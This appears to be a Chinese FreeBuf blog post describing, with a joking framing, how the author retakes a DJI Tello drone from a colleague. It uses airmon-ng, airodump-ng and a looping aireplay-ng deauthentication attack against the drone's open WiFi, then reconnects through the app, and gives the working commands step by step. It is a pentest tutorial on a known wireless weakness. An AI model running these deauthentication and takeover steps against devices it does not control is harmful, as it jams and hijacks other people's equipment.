freeBuf
主站

分类

漏洞 工具 极客 Web安全 系统安全 网络安全 无线安全 设备/客户端安全 数据安全 安全管理 企业安全 工控安全

特色

头条 人物志 活动 视频 观点 招聘 报告 资讯 区块链安全 标准与合规 容器安全 公开课

官方公众号企业安全新浪微博

FreeBuf.COM网络安全行业门户,每日发布专业的安全资讯、技术剖析。

FreeBuf+小程序

FreeBuf+小程序

夺回无人机!
2021-11-18 20:15:48

识链实验室@李饼饼
李某人今天新买了个无人机~

美滋滋想飞一飞再拆解研究固件时.....

面对砂锅大的拳头,李某人觉得还是以同事间的感情为重!

哼~搁那儿研究呢

李某人决定用知识夺回心爱的无人机!
首先IOT设备通常脆弱点为:Web端漏洞、APP端漏洞、固件漏洞、无线电通信漏洞、硬件漏洞
无人机这类设备通常可以以无线电通信为切入点(固件被抢走了还没来得及研究)
既然讲到无人机无线电通信,第一时间想到的当然是WiFi,而且既然是新设备处于未配置状态,大概率连接是空口令或者弱口令,如果设备没有绑MAC地址,用常规的WiFi渗透思路通过发包让对方设备掉线,然后重新用客户端连接并接管设备理论上是可行的,接着来试试~
1.启动kali,iwconfig查看无线网卡配置

2.airmon-ng start wlan0将wlan0开启监听模式

3.airodump-ng wlan0mon扫描网络,TELLO-EE8A75,就是你了
BSSID:WiFi MAC地址
PWR:信号强度
BEACONS:信标
DATA:数据
CH:信道
ENS:加密方式,图中OPN为开放
ESSID:WiFi名称

4.新建个终端airodump-ng wlan0mon --bssid <BSSID> --channel 9
STATION为无人机MAC地址

5.再新建个终端aireplay-ng --deauth 0 -c <STATION> -a <BSSID> wlan0mon看看效果去~
--deauth为冲突攻击模式,0为循环攻击

6.屏都黑了,还搁那儿研究呢

7.登录APP客户端,成功夺回

市面上无人机安全问题各个层面层出不穷,这里仅提供简单思路,供各位举一反三,之后拆解设备分析固件安全问题。

本文作者:, 转载请注明来自FreeBuf.COM

# 渗透测试 # 无线安全
被以下专辑收录,发现更多精彩内容
+ 收入我的专辑
评论 按热度排序

登录/注册后在FreeBuf发布内容哦

相关推荐
\
  • 0 文章数
  • 0 评论数
  • 0 关注者
登录 / 注册后在FreeBuf发布内容哦
收入专辑